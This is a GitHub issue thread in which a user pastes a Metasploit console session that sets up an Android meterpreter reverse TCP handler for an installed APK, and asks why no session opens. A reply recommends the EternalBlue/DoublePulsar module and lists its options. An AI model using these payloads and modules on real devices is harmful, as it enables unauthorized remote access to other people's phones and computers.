Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[*] Exploit completed, but no session was created.___kali linux #105

Open
AqeelTariq97 opened this issue Dec 15, 2020 · 1 comment
Open

Comments

@AqeelTariq97
Copy link

AqeelTariq97 commented Dec 15, 2020

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.*.**
LHOST => 10.**.*.**
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.0.*.**: 4444 
msf6 exploit(multi/handler) > 

I also install the apk file in phone but system is not able to get the device.
i also use exploit instead of exploit -j but the problem is same.
help me out solving this problem I am stuck.

@AqeelTariq97 AqeelTariq97 changed the title [*] Exploit completed, but no session was created. [*] Exploit completed, but no session was created.___kali linux Dec 15, 2020
@Morsmalleo
Copy link

Morsmalleo commented Jan 24, 2021

Dont use multi handler, type into the msfconsole search eternalblue_doublepulsar it l should come up as 0 so just type use 0 then set the payload, Eternalbluepath, Doublepulsarpath, RHOSTS, winepath and the targetarchitecture

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants